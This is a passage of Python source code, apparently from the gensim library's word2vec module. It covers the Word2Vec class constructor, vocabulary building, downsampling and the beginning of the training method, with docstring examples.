such as `new_york_times` or `financial_crisis`:
.. sourcecode:: pycon
>>> from gensim.models import Phrases
>>>
>>> # Train a bigram detector.
>>> bigram_transformer = Phrases(common_texts)
>>>
>>> # Apply the trained MWE detector to a corpus, using the result to train a Word2vec model.
>>> model = Word2Vec(bigram_transformer[common_texts], min_count=1)
Pretrained models
=================
Gensim comes with several already pre-trained models, in the
`Gensim-data repository <https://github.com/RaRe-Technologies/gensim-data>`_:
.. sourcecode:: pycon
>>> import gensim.downloader
>>> # Show all available models in gensim-data
>>> print(list(gensim.downloader.info()['models'].keys()))
['fasttext-wiki-news-subwords-300',
'conceptnet-numberbatch-17-06-300',
'word2vec-ruscorpora-300',
'word2vec-google-news-300',
'glove-wiki-gigaword-50',
'glove-wiki-gigaword-100',
'glove-wiki-gigaword-200',
'glove-wiki-gigaword-300',
'glove-twitter-25',
'glove-twitter-50',
'glove-twitter-100',
'glove-twitter-200',
'__testing_word2vec-matrix-synopsis']
>>>
>>> # Download the "glove-twitter-25" embeddings
>>> glove_vectors = gensim.downloader.load('glove-twitter-25')
>>>
>>> # Use the downloaded vectors as usual:
>>> glove_vectors.most_similar('twitter')
[('facebook', 0.948005199432373),
('tweet', 0.9403423070907593),
('fb', 0.9342358708381653),
('instagram', 0.9104824066162109),
('chat', 0.8964964747428894),
('hashtag', 0.8885937333106995),
('tweets', 0.8878158330917358),
('tl', 0.8778461217880249),
('link', 0.8778210878372192),
('internet', 0.8753897547721863)]
"""
from __future__ import division # py3 "true division"
import logging
import sys
import os
import heapq
from timeit import default_timer
from collections import defaultdict, namedtuple
from collections.abc import Iterable
from types import GeneratorType
import threading
import itertools
import copy
from queue import Queue, Empty
from numpy import float32 as REAL
import numpy as np
from gensim.utils import keep_vocab_item, call_on_class_only, deprecated
from gensim.models.keyedvectors import KeyedVectors, pseudorandom_weak_vector
from gensim import utils, matutils
logger = logging.getLogger(__name__)
try:
from gensim.models.word2vec_inner import ( # noqa: F401
train_batch_sg,
train_batch_cbow,
score_sentence_sg,
score_sentence_cbow,
MAX_WORDS_IN_BATCH,
FAST_VERSION,
)
except ImportError:
raise utils.NO_CYTHON
try:
from gensim.models.word2vec_corpusfile import train_epoch_sg, train_epoch_cbow, CORPUSFILE_VERSION
except ImportError:
# file-based word2vec is not supported
CORPUSFILE_VERSION = -1
def train_epoch_sg(
model, corpus_file, offset, _cython_vocab, _cur_epoch, _expected_examples, _expected_words,
_work, _neu1, compute_loss,
):
raise RuntimeError("Training with corpus_file argument is not supported")
def train_epoch_cbow(
model, corpus_file, offset, _cython_vocab, _cur_epoch, _expected_examples, _expected_words,
_work, _neu1, compute_loss,
):
raise RuntimeError("Training with corpus_file argument is not supported")
class Word2Vec(utils.SaveLoad):
def __init__(
self, sentences=None, corpus_file=None, vector_size=100, alpha=0.025, window=5, min_count=5,
max_vocab_size=None, sample=1e-3, seed=1, workers=3, min_alpha=0.0001,
sg=0, hs=0, negative=5, ns_exponent=0.75, cbow_mean=1, hashfxn=hash, epochs=5, null_word=0,
trim_rule=None, sorted_vocab=1, batch_words=MAX_WORDS_IN_BATCH, compute_loss=False, callbacks=(),
comment=None, max_final_vocab=None,
):
"""Train, use and evaluate neural networks described in https://code.google.com/p/word2vec/.
Once you're finished training a model (=no more updates, only querying)
store and use only the :class:`~gensim.models.keyedvectors.KeyedVectors` instance in ``self.wv``
to reduce memory.
The full model can be stored/loaded via its :meth:`~gensim.models.word2vec.Word2Vec.save` and
:meth:`~gensim.models.word2vec.Word2Vec.load` methods.
The trained word vectors can also be stored/loaded from a format compatible with the
original word2vec implementation via `self.wv.save_word2vec_format`
and :meth:`gensim.models.keyedvectors.KeyedVectors.load_word2vec_format`.
Parameters
----------
sentences : iterable of iterables, optional
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
See also the `tutorial on data streaming in Python
<https://rare-technologies.com/data-streaming-in-python-generators-iterators-iterables/>`_.
If you don't supply `sentences`, the model is left uninitialized -- use if you plan to initialize it
in some other way.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get performance boost. Only one of `sentences` or
`corpus_file` arguments need to be passed (or none of them, in that case, the model is left uninitialized).
vector_size : int, optional
Dimensionality of the word vectors.
window : int, optional
Maximum distance between the current and predicted word within a sentence.
min_count : int, optional
Ignores all words with total frequency lower than this.
workers : int, optional
Use these many worker threads to train the model (=faster training with multicore machines).
sg : {0, 1}, optional
Training algorithm: 1 for skip-gram; otherwise CBOW.
hs : {0, 1}, optional
If 1, hierarchical softmax will be used for model training.
If 0, and `negative` is non-zero, negative sampling will be used.
negative : int, optional
If > 0, negative sampling will be used, the int for negative specifies how many "noise words"
should be drawn (usually between 5-20).
If set to 0, no negative sampling is used.
ns_exponent : float, optional
The exponent used to shape the negative sampling distribution. A value of 1.0 samples exactly in proportion
to the frequencies, 0.0 samples all words equally, while a negative value samples low-frequency words more
than high-frequency words. The popular default value of 0.75 was chosen by the original Word2Vec paper.
More recently, in https://arxiv.org/abs/1804.04212, Caselles-Dupré, Lesaint, & Royo-Letelier suggest that
other values may perform better for recommendation applications.
cbow_mean : {0, 1}, optional
If 0, use the sum of the context word vectors. If 1, use the mean, only applies when cbow is used.
alpha : float, optional
The initial learning rate.
min_alpha : float, optional
Learning rate will linearly drop to `min_alpha` as training progresses.
seed : int, optional
Seed for the random number generator. Initial vectors for each word are seeded with a hash of
the concatenation of word + `str(seed)`. Note that for a fully deterministically-reproducible run,
you must also limit the model to a single worker thread (`workers=1`), to eliminate ordering jitter
from OS thread scheduling. (In Python 3, reproducibility between interpreter launches also requires
use of the `PYTHONHASHSEED` environment variable to control hash randomization).
max_vocab_size : int, optional
Limits the RAM during vocabulary building; if there are more unique
words than this, then prune the infrequent ones. Every 10 million word types need about 1GB of RAM.
Set to `None` for no limit.
max_final_vocab : int, optional
Limits the vocab to a target vocab size by automatically picking a matching min_count. If the specified
min_count is more than the calculated min_count, the specified min_count will be used.
Set to `None` if not required.
sample : float, optional
The threshold for configuring which higher-frequency words are randomly downsampled,
useful range is (0, 1e-5).
hashfxn : function, optional
Hash function to use to randomly initialize weights, for increased training reproducibility.
epochs : int, optional
Number of iterations (epochs) over the corpus. (Formerly: `iter`)
trim_rule : function, optional
Vocabulary trimming rule, specifies whether certain words should remain in the vocabulary,
be trimmed away, or handled using the default (discard if word count < min_count).
Can be None (min_count will be used, look to :func:`~gensim.utils.keep_vocab_item`),
or a callable that accepts parameters (word, count, min_count) and returns either
:attr:`gensim.utils.RULE_DISCARD`, :attr:`gensim.utils.RULE_KEEP` or :attr:`gensim.utils.RULE_DEFAULT`.
The rule, if given, is only used to prune vocabulary during build_vocab() and is not stored as part of the
model.
The input parameters are of the following types:
* `word` (str) - the word we are examining
* `count` (int) - the word's frequency count in the corpus
* `min_count` (int) - the minimum count threshold.
sorted_vocab : {0, 1}, optional
If 1, sort the vocabulary by descending frequency before assigning word indexes.
See :meth:`~gensim.models.keyedvectors.KeyedVectors.sort_by_descending_frequency()`.
batch_words : int, optional
Target size (in words) for batches of examples passed to worker threads (and
thus cython routines).(Larger batches will be passed if individual
texts are longer than 10000 words, but the standard cython code truncates to that maximum.)
compute_loss: bool, optional
If True, computes and stores loss value which can be retrieved using
:meth:`~gensim.models.word2vec.Word2Vec.get_latest_training_loss`.
callbacks : iterable of :class:`~gensim.models.callbacks.CallbackAny2Vec`, optional
Sequence of callbacks to be executed at specific stages during training.
Examples
--------
Initialize and train a :class:`~gensim.models.word2vec.Word2Vec` model
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>> sentences = [["cat", "say", "meow"], ["dog", "say", "woof"]]
>>> model = Word2Vec(sentences, min_count=1)
Attributes
----------
wv : :class:`~gensim.models.keyedvectors.KeyedVectors`
This object essentially contains the mapping between words and embeddings. After training, it can be used
directly to query those embeddings in various ways. See the module level docstring for examples.
"""
corpus_iterable = sentences
self.vector_size = int(vector_size)
self.workers = int(workers)
self.epochs = epochs
self.train_count = 0
self.total_train_time = 0
self.batch_words = batch_words
self.sg = int(sg)
self.alpha = float(alpha)
self.min_alpha = float(min_alpha)
self.window = int(window)
self.random = np.random.RandomState(seed)
self.hs = int(hs)
self.negative = int(negative)
self.ns_exponent = ns_exponent
self.cbow_mean = int(cbow_mean)
self.compute_loss = bool(compute_loss)
self.running_training_loss = 0
self.min_alpha_yet_reached = float(alpha)
self.corpus_count = 0
self.corpus_total_words = 0
self.max_final_vocab = max_final_vocab
self.max_vocab_size = max_vocab_size
self.min_count = min_count
self.sample = sample
self.sorted_vocab = sorted_vocab
self.null_word = null_word
self.cum_table = None # for negative sampling
self.raw_vocab = None
if not hasattr(self, 'wv'): # set unless subclass already set (eg: FastText)
self.wv = KeyedVectors(vector_size)
# EXPERIMENTAL lockf feature; create minimal no-op lockf arrays (1 element of 1.0)
# advanced users should directly resize/adjust as desired after any vocab growth
self.wv.vectors_lockf = np.ones(1, dtype=REAL) # 0.0 values suppress word-backprop-updates; 1.0 allows
self.hashfxn = hashfxn
self.seed = seed
if not hasattr(self, 'layer1_size'): # set unless subclass already set (as for Doc2Vec dm_concat mode)
self.layer1_size = vector_size
self.comment = comment
self.load = call_on_class_only
if corpus_iterable is not None or corpus_file is not None:
self._check_corpus_sanity(corpus_iterable=corpus_iterable, corpus_file=corpus_file, passes=(epochs + 1))
self.build_vocab(corpus_iterable=corpus_iterable, corpus_file=corpus_file, trim_rule=trim_rule)
self.train(
corpus_iterable=corpus_iterable, corpus_file=corpus_file, total_examples=self.corpus_count,
total_words=self.corpus_total_words, epochs=self.epochs, start_alpha=self.alpha,
end_alpha=self.min_alpha, compute_loss=self.compute_loss, callbacks=callbacks)
else:
if trim_rule is not None:
logger.warning(
"The rule, if given, is only used to prune vocabulary during build_vocab() "
"and is not stored as part of the model. Model initialized without sentences. "
"trim_rule provided, if any, will be ignored.")
if callbacks:
logger.warning(
"Callbacks are no longer retained by the model, so must be provided whenever "
"training is triggered, as in initialization with a corpus or calling `train()`. "
"The callbacks provided in this initialization without triggering train will "
"be ignored.")
self.add_lifecycle_event("created", params=str(self))
def build_vocab(
self, corpus_iterable=None, corpus_file=None, update=False, progress_per=10000,
keep_raw_vocab=False, trim_rule=None, **kwargs,
):
"""Build vocabulary from a sequence of sentences (can be a once-only generator stream).
Parameters
----------
corpus_iterable : iterable of list of str
Can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` module for such examples.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get performance boost. Only one of `sentences` or
`corpus_file` arguments need to be passed (not both of them).
update : bool
If true, the new words in `sentences` will be added to model's vocab.
progress_per : int, optional
Indicates how many words to process before showing/updating the progress.
keep_raw_vocab : bool, optional
If False, the raw vocabulary will be deleted after the scaling is done to free up RAM.
trim_rule : function, optional
Vocabulary trimming rule, specifies whether certain words should remain in the vocabulary,
be trimmed away, or handled using the default (discard if word count < min_count).
Can be None (min_count will be used, look to :func:`~gensim.utils.keep_vocab_item`),
or a callable that accepts parameters (word, count, min_count) and returns either
:attr:`gensim.utils.RULE_DISCARD`, :attr:`gensim.utils.RULE_KEEP` or :attr:`gensim.utils.RULE_DEFAULT`.
The rule, if given, is only used to prune vocabulary during current method call and is not stored as part
of the model.
The input parameters are of the following types:
* `word` (str) - the word we are examining
* `count` (int) - the word's frequency count in the corpus
* `min_count` (int) - the minimum count threshold.
**kwargs : object
Keyword arguments propagated to `self.prepare_vocab`.
"""
self._check_corpus_sanity(corpus_iterable=corpus_iterable, corpus_file=corpus_file, passes=1)
total_words, corpus_count = self.scan_vocab(
corpus_iterable=corpus_iterable, corpus_file=corpus_file, progress_per=progress_per, trim_rule=trim_rule)
self.corpus_count = corpus_count
self.corpus_total_words = total_words
report_values = self.prepare_vocab(update=update, keep_raw_vocab=keep_raw_vocab, trim_rule=trim_rule, **kwargs)
report_values['memory'] = self.estimate_memory(vocab_size=report_values['num_retained_words'])
self.prepare_weights(update=update)
self.add_lifecycle_event("build_vocab", update=update, trim_rule=str(trim_rule))
def build_vocab_from_freq(
self, word_freq, keep_raw_vocab=False, corpus_count=None, trim_rule=None, update=False,
):
"""Build vocabulary from a dictionary of word frequencies.
Parameters
----------
word_freq : dict of (str, int)
A mapping from a word in the vocabulary to its frequency count.
keep_raw_vocab : bool, optional
If False, delete the raw vocabulary after the scaling is done to free up RAM.
corpus_count : int, optional
Even if no corpus is provided, this argument can set corpus_count explicitly.
trim_rule : function, optional
Vocabulary trimming rule, specifies whether certain words should remain in the vocabulary,
be trimmed away, or handled using the default (discard if word count < min_count).
Can be None (min_count will be used, look to :func:`~gensim.utils.keep_vocab_item`),
or a callable that accepts parameters (word, count, min_count) and returns either
:attr:`gensim.utils.RULE_DISCARD`, :attr:`gensim.utils.RULE_KEEP` or :attr:`gensim.utils.RULE_DEFAULT`.
The rule, if given, is only used to prune vocabulary during current method call and is not stored as part
of the model.
The input parameters are of the following types:
* `word` (str) - the word we are examining
* `count` (int) - the word's frequency count in the corpus
* `min_count` (int) - the minimum count threshold.
update : bool, optional
If true, the new provided words in `word_freq` dict will be added to model's vocab.
"""
logger.info("Processing provided word frequencies")
# Instead of scanning text, this will assign provided word frequencies dictionary(word_freq)
# to be directly the raw vocab
raw_vocab = word_freq
logger.info(
"collected %i different raw word, with total frequency of %i",
len(raw_vocab), sum(raw_vocab.values()),
)
# Since no sentences are provided, this is to control the corpus_count.
self.corpus_count = corpus_count or 0
self.raw_vocab = raw_vocab
# trim by min_count & precalculate downsampling
report_values = self.prepare_vocab(keep_raw_vocab=keep_raw_vocab, trim_rule=trim_rule, update=update)
report_values['memory'] = self.estimate_memory(vocab_size=report_values['num_retained_words'])
self.prepare_weights(update=update) # build tables & arrays
def _scan_vocab(self, sentences, progress_per, trim_rule):
sentence_no = -1
total_words = 0
min_reduce = 1
vocab = defaultdict(int)
checked_string_types = 0
for sentence_no, sentence in enumerate(sentences):
if not checked_string_types:
if isinstance(sentence, str):
logger.warning(
"Each 'sentences' item should be a list of words (usually unicode strings). "
"First item here is instead plain %s.",
type(sentence),
)
checked_string_types += 1
if sentence_no % progress_per == 0:
logger.info(
"PROGRESS: at sentence #%i, processed %i words, keeping %i word types",
sentence_no, total_words, len(vocab)
)
for word in sentence:
vocab[word] += 1
total_words += len(sentence)
if self.max_vocab_size and len(vocab) > self.max_vocab_size:
utils.prune_vocab(vocab, min_reduce, trim_rule=trim_rule)
min_reduce += 1
corpus_count = sentence_no + 1
self.raw_vocab = vocab
return total_words, corpus_count
def scan_vocab(self, corpus_iterable=None, corpus_file=None, progress_per=10000, workers=None, trim_rule=None):
logger.info("collecting all words and their counts")
if corpus_file:
corpus_iterable = LineSentence(corpus_file)
total_words, corpus_count = self._scan_vocab(corpus_iterable, progress_per, trim_rule)
logger.info(
"collected %i word types from a corpus of %i raw words and %i sentences",
len(self.raw_vocab), total_words, corpus_count
)
return total_words, corpus_count
def prepare_vocab(
self, update=False, keep_raw_vocab=False, trim_rule=None,
min_count=None, sample=None, dry_run=False,
):
"""Apply vocabulary settings for `min_count` (discarding less-frequent words)
and `sample` (controlling the downsampling of more-frequent words).
Calling with `dry_run=True` will only simulate the provided settings and
report the size of the retained vocabulary, effective corpus length, and
estimated memory requirements. Results are both printed via logging and
returned as a dict.
Delete the raw vocabulary after the scaling is done to free up RAM,
unless `keep_raw_vocab` is set.
"""
min_count = min_count or self.min_count
sample = sample or self.sample
drop_total = drop_unique = 0
# set effective_min_count to min_count in case max_final_vocab isn't set
self.effective_min_count = min_count
# if max_final_vocab is specified instead of min_count
# pick a min_count which satisfies max_final_vocab as well as possible
if self.max_final_vocab is not None:
sorted_vocab = sorted(self.raw_vocab.keys(), key=lambda word: self.raw_vocab[word], reverse=True)
calc_min_count = 1
if self.max_final_vocab < len(sorted_vocab):
calc_min_count = self.raw_vocab[sorted_vocab[self.max_final_vocab]] + 1
self.effective_min_count = max(calc_min_count, min_count)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"max_final_vocab={self.max_final_vocab} and min_count={min_count} resulted "
f"in calc_min_count={calc_min_count}, effective_min_count={self.effective_min_count}"
)
)
if not update:
logger.info("Creating a fresh vocabulary")
retain_total, retain_words = 0, []
# Discard words less-frequent than min_count
if not dry_run:
self.wv.index_to_key = []
# make stored settings match these applied settings
self.min_count = min_count
self.sample = sample
self.wv.key_to_index = {}
for word, v in self.raw_vocab.items():
if keep_vocab_item(word, v, self.effective_min_count, trim_rule=trim_rule):
retain_words.append(word)
retain_total += v
if not dry_run:
self.wv.key_to_index[word] = len(self.wv.index_to_key)
self.wv.index_to_key.append(word)
else:
drop_unique += 1
drop_total += v
if not dry_run:
# now update counts
for word in self.wv.index_to_key:
self.wv.set_vecattr(word, 'count', self.raw_vocab[word])
original_unique_total = len(retain_words) + drop_unique
retain_unique_pct = len(retain_words) * 100 / max(original_unique_total, 1)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"effective_min_count={self.effective_min_count} retains {len(retain_words)} unique "
f"words ({retain_unique_pct}%% of original {original_unique_total}, drops {drop_unique})"
),
)
original_total = retain_total + drop_total
retain_pct = retain_total * 100 / max(original_total, 1)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"effective_min_count={self.effective_min_count} leaves {retain_total} word corpus "
f"({retain_pct}%% of original {original_total}, drops {drop_total})"
),
)
else:
logger.info("Updating model with new vocabulary")
new_total = pre_exist_total = 0
new_words = []
pre_exist_words = []
for word, v in self.raw_vocab.items():
if keep_vocab_item(word, v, self.effective_min_count, trim_rule=trim_rule):
if self.wv.has_index_for(word):
pre_exist_words.append(word)
pre_exist_total += v
if not dry_run:
pass
else:
new_words.append(word)
new_total += v
if not dry_run:
self.wv.key_to_index[word] = len(self.wv.index_to_key)
self.wv.index_to_key.append(word)
else:
drop_unique += 1
drop_total += v
if not dry_run:
# now update counts
self.wv.allocate_vecattrs(attrs=['count'], types=[type(0)])
for word in self.wv.index_to_key:
self.wv.set_vecattr(word, 'count', self.wv.get_vecattr(word, 'count') + self.raw_vocab.get(word, 0))
original_unique_total = len(pre_exist_words) + len(new_words) + drop_unique
pre_exist_unique_pct = len(pre_exist_words) * 100 / max(original_unique_total, 1)
new_unique_pct = len(new_words) * 100 / max(original_unique_total, 1)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"added {len(new_words)} new unique words ({new_unique_pct}%% of original "
f"{original_unique_total}) and increased the count of {len(pre_exist_words)} "
f"pre-existing words ({pre_exist_unique_pct}%% of original {original_unique_total})"
),
)
retain_words = new_words + pre_exist_words
retain_total = new_total + pre_exist_total
# Precalculate each vocabulary item's threshold for sampling
if not sample:
# no words downsampled
threshold_count = retain_total
elif sample < 1.0:
# traditional meaning: set parameter as proportion of total
threshold_count = sample * retain_total
else:
# new shorthand: sample >= 1 means downsample all words with higher count than sample
threshold_count = int(sample * (3 + np.sqrt(5)) / 2)
downsample_total, downsample_unique = 0, 0
for w in retain_words:
v = self.raw_vocab[w]
word_probability = (np.sqrt(v / threshold_count) + 1) * (threshold_count / v)
if word_probability < 1.0:
downsample_unique += 1
downsample_total += word_probability * v
else:
word_probability = 1.0
downsample_total += v
if not dry_run:
self.wv.set_vecattr(w, 'sample_int', np.uint32(word_probability * (2**32 - 1)))
if not dry_run and not keep_raw_vocab:
logger.info("deleting the raw counts dictionary of %i items", len(self.raw_vocab))
self.raw_vocab = defaultdict(int)
logger.info("sample=%g downsamples %i most-common words", sample, downsample_unique)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"downsampling leaves estimated {downsample_total} word corpus "
f"({downsample_total * 100.0 / max(retain_total, 1):.1f}%% of prior {retain_total})"
),
)
# return from each step: words-affected, resulting-corpus-size, extra memory estimates
report_values = {
'drop_unique': drop_unique, 'retain_total': retain_total, 'downsample_unique': downsample_unique,
'downsample_total': int(downsample_total), 'num_retained_words': len(retain_words)
}
if self.null_word:
# create null pseudo-word for padding when using concatenative L1 (run-of-words)
# this word is only ever input – never predicted – so count, huffman-point, etc doesn't matter
self.add_null_word()
if self.sorted_vocab and not update:
self.wv.sort_by_descending_frequency()
if self.hs:
# add info about each word's Huffman encoding
self.create_binary_tree()
if self.negative:
# build the table for drawing random words (for negative sampling)
self.make_cum_table()
return report_values
def estimate_memory(self, vocab_size=None, report=None):
"""Estimate required memory for a model using current settings and provided vocabulary size.
Parameters
----------
vocab_size : int, optional
Number of unique tokens in the vocabulary
report : dict of (str, int), optional
A dictionary from string representations of the model's memory consuming members to their size in bytes.
Returns
-------
dict of (str, int)
A dictionary from string representations of the model's memory consuming members to their size in bytes.
"""
vocab_size = vocab_size or len(self.wv)
report = report or {}
report['vocab'] = vocab_size * (700 if self.hs else 500)
report['vectors'] = vocab_size * self.vector_size * np.dtype(REAL).itemsize
if self.hs:
report['syn1'] = vocab_size * self.layer1_size * np.dtype(REAL).itemsize
if self.negative:
report['syn1neg'] = vocab_size * self.layer1_size * np.dtype(REAL).itemsize
report['total'] = sum(report.values())
logger.info(
"estimated required memory for %i words and %i dimensions: %i bytes",
vocab_size, self.vector_size, report['total'],
)
return report
def add_null_word(self):
word = '\0'
self.wv.key_to_index[word] = len(self.wv)
self.wv.index_to_key.append(word)
self.wv.set_vecattr(word, 'count', 1)
def create_binary_tree(self):
"""Create a `binary Huffman tree <https://en.wikipedia.org/wiki/Huffman_coding>`_ using stored vocabulary
word counts. Frequent words will have shorter binary codes.
Called internally from :meth:`~gensim.models.word2vec.Word2VecVocab.build_vocab`.
"""
_assign_binary_codes(self.wv)
def make_cum_table(self, domain=2**31 - 1):
"""Create a cumulative-distribution table using stored vocabulary word counts for
drawing random words in the negative-sampling training routines.
To draw a word index, choose a random integer up to the maximum value in the table (cum_table[-1]),
then finding that integer's sorted insertion point (as if by `bisect_left` or `ndarray.searchsorted()`).
That insertion point is the drawn index, coming up in proportion equal to the increment at that slot.
"""
vocab_size = len(self.wv.index_to_key)
self.cum_table = np.zeros(vocab_size, dtype=np.uint32)
# compute sum of all power (Z in paper)
train_words_pow = 0.0
for word_index in range(vocab_size):
count = self.wv.get_vecattr(word_index, 'count')
train_words_pow += count**self.ns_exponent
cumulative = 0.0
for word_index in range(vocab_size):
count = self.wv.get_vecattr(word_index, 'count')
cumulative += count**self.ns_exponent
self.cum_table[word_index] = round(cumulative / train_words_pow * domain)
if len(self.cum_table) > 0:
assert self.cum_table[-1] == domain
def prepare_weights(self, update=False):
"""Build tables and model weights based on final vocabulary settings."""
# set initial input/projection and hidden weights
if not update:
self.init_weights()
else:
self.update_weights()
@deprecated("Use gensim.models.keyedvectors.pseudorandom_weak_vector() directly")
def seeded_vector(self, seed_string, vector_size):
return pseudorandom_weak_vector(vector_size, seed_string=seed_string, hashfxn=self.hashfxn)
def init_weights(self):
"""Reset all projection weights to an initial (untrained) state, but keep the existing vocabulary."""
logger.info("resetting layer weights")
self.wv.resize_vectors(seed=self.seed)
if self.hs:
self.syn1 = np.zeros((len(self.wv), self.layer1_size), dtype=REAL)
if self.negative:
self.syn1neg = np.zeros((len(self.wv), self.layer1_size), dtype=REAL)
def update_weights(self):
"""Copy all the existing weights, and reset the weights for the newly added vocabulary."""
logger.info("updating layer weights")
# Raise an error if an online update is run before initial training on a corpus
if not len(self.wv.vectors):
raise RuntimeError(
"You cannot do an online vocabulary-update of a model which has no prior vocabulary. "
"First build the vocabulary of your model with a corpus before doing an online update."
)
preresize_count = len(self.wv.vectors)
self.wv.resize_vectors(seed=self.seed)
gained_vocab = len(self.wv.vectors) - preresize_count
if self.hs:
self.syn1 = np.vstack([self.syn1, np.zeros((gained_vocab, self.layer1_size), dtype=REAL)])
if self.negative:
pad = np.zeros((gained_vocab, self.layer1_size), dtype=REAL)
self.syn1neg = np.vstack([self.syn1neg, pad])
@deprecated(
"Gensim 4.0.0 implemented internal optimizations that make calls to init_sims() unnecessary. "
"init_sims() is now obsoleted and will be completely removed in future versions. "
"See https://github.com/RaRe-Technologies/gensim/wiki/Migrating-from-Gensim-3.x-to-4"
)
def init_sims(self, replace=False):
"""
Precompute L2-normalized vectors. Obsoleted.
If you need a single unit-normalized vector for some key, call
:meth:`~gensim.models.keyedvectors.KeyedVectors.get_vector` instead:
``word2vec_model.wv.get_vector(key, norm=True)``.
To refresh norms after you performed some atypical out-of-band vector tampering,
call `:meth:`~gensim.models.keyedvectors.KeyedVectors.fill_norms()` instead.
Parameters
----------
replace : bool
If True, forget the original trained vectors and only keep the normalized ones.
You lose information if you do this.
"""
self.wv.init_sims(replace=replace)
def _do_train_epoch(
self, corpus_file, thread_id, offset, cython_vocab, thread_private_mem, cur_epoch,
total_examples=None, total_words=None, **kwargs,
):
work, neu1 = thread_private_mem
if self.sg:
examples, tally, raw_tally = train_epoch_sg(
self, corpus_file, offset, cython_vocab, cur_epoch,
total_examples, total_words, work, neu1, self.compute_loss,
)
else:
examples, tally, raw_tally = train_epoch_cbow(
self, corpus_file, offset, cython_vocab, cur_epoch,
total_examples, total_words, work, neu1, self.compute_loss,
)
return examples, tally, raw_tally
def _do_train_job(self, sentences, alpha, inits):
"""Train the model on a single batch of sentences.
Parameters
----------
sentences : iterable of list of str
Corpus chunk to be used in this training batch.
alpha : float
The learning rate used in this batch.
inits : (np.ndarray, np.ndarray)
Each worker threads private work memory.
Returns
-------
(int, int)
2-tuple (effective word count after ignoring unknown words and sentence length trimming, total word count).
"""
work, neu1 = inits
tally = 0
if self.sg:
tally += train_batch_sg(self, sentences, alpha, work, self.compute_loss)
else:
tally += train_batch_cbow(self, sentences, alpha, work, neu1, self.compute_loss)
return tally, self._raw_word_count(sentences)
def _clear_post_train(self):
"""Clear any cached values that training may have invalidated."""
self.wv.norms = None
def train(
self, corpus_iterable=None, corpus_file=None, total_examples=None, total_words=None,
epochs=None, start_alpha=None, end_alpha=None, word_count=0,
queue_factor=2, report_delay=1.0, compute_loss=False, callbacks=(),
**kwargs,
):
"""Update the model's neural weights from a sequence of sentences.
Notes
-----
To support linear learning-rate decay from (initial) `alpha` to `min_alpha`, and accurate
progress-percentage logging, either `total_examples` (count of sentences) or `total_words` (count of
raw words in sentences) **MUST** be provided. If `sentences` is the same corpus
that was provided to :meth:`~gensim.models.word2vec.Word2Vec.build_vocab` earlier,
you can simply use `total_examples=self.corpus_count`.
Warnings
--------
To avoid common mistakes around the model's ability to do multiple training passes itself, an
explicit `epochs` argument **MUST** be provided. In the common and recommended case
where :meth:`~gensim.models.word2vec.Word2Vec.train` is only called once, you can set `epochs=self.epochs`.
Parameters
----------
corpus_iterable : iterable of list of str
The ``corpus_iterable`` can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network, to limit RAM usage.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
See also the `tutorial on data streaming in Python
<https://rare-technologies.com/data-streaming-in-python-generators-iterators-iterables/>`_.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get performance boost. Only one of `sentences` or
`corpus_file` arguments need to be passed (not both of them).
total_examples : int
Count of sentences.
total_words : int
Count of raw words in sentences.
epochs : int
Number of iterations (epochs) over the corpus.
start_alpha : float, optional
Initial learning rate. If supplied, replaces the starting `alpha` from the constructor,
for this one call to`train()`.
Use only if making multiple calls to `train()`, when you want to manage the alpha learning-rate yourself
(not recommended).
end_alpha : float, optional
Final learning rate. Drops linearly from `start_alpha`.
If supplied, this replaces the final `min_alpha` from the constructor, for this one call to `train()`.
Use only if making multiple calls to `train()`, when you want to manage the alpha learning-rate yourself
(not recommended).
word_count : int, optional
Count of words already trained. Set this to 0 for the usual
case of training on all words in sentences.
queue_factor : int, optional
Multiplier for size of queue (number of workers * queue_factor).
report_delay : float, optional
Seconds to wait before reporting progress.
compute_loss: bool, optional
If True, computes and stores loss value which can be retrieved using
:meth:`~gensim.models.word2vec.Word2Vec.get_latest_training_loss`.
callbacks : iterable of :class:`~gensim.models.callbacks.CallbackAny2Vec`, optional
Sequence of callbacks to be executed at specific stages during training.
Examples
--------
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>> sentences = [["cat", "say", "meow"], ["dog", "say", "woof"]]
>>>
>>> model = Word2Vec(min_count=1)
>>> model.build_vocab(sentences) # prepare the model vocabulary
>>> model.train(sentences, total_examples=model.corpus_count, epochs=model.epochs) # train word vectors
(1, 30)
"""
self.alpha = start_alpha or self.alpha
self.min_alpha = end_alpha or self.min_alpha
self.epochs = epochs
self._check_training_sanity(epochs=epochs, total_examples=total_examples, total_words=total_words)
self._check_corpus_sanity(corpus_iterable=corpus_iterable, corpus_file=corpus_file, passes=epochs)
self.add_lifecycle_event(
"train",
msg=(
f"training model with {self.workers} workers on {len(self.wv)} vocabulary and "
f"{self.layer1_size} features, using sg={self.sg} hs={self.hs} sample={self.sample} "
f"negative={self.negative} window={self.window}"
),
)
self.compute_loss = compute_loss
self.running_training_loss = 0.0
for callback in callbacks:
callback.on_train_begin(self)
trained_word_count = 0
raw_word_count = 0
start = default_timer() - 0.00001
job_tally = 0
for cur_epoch in range(self.epochs):
for callback in callbacks:
callback.on_epoch_begin(self)
if corpus_iterable is not None:
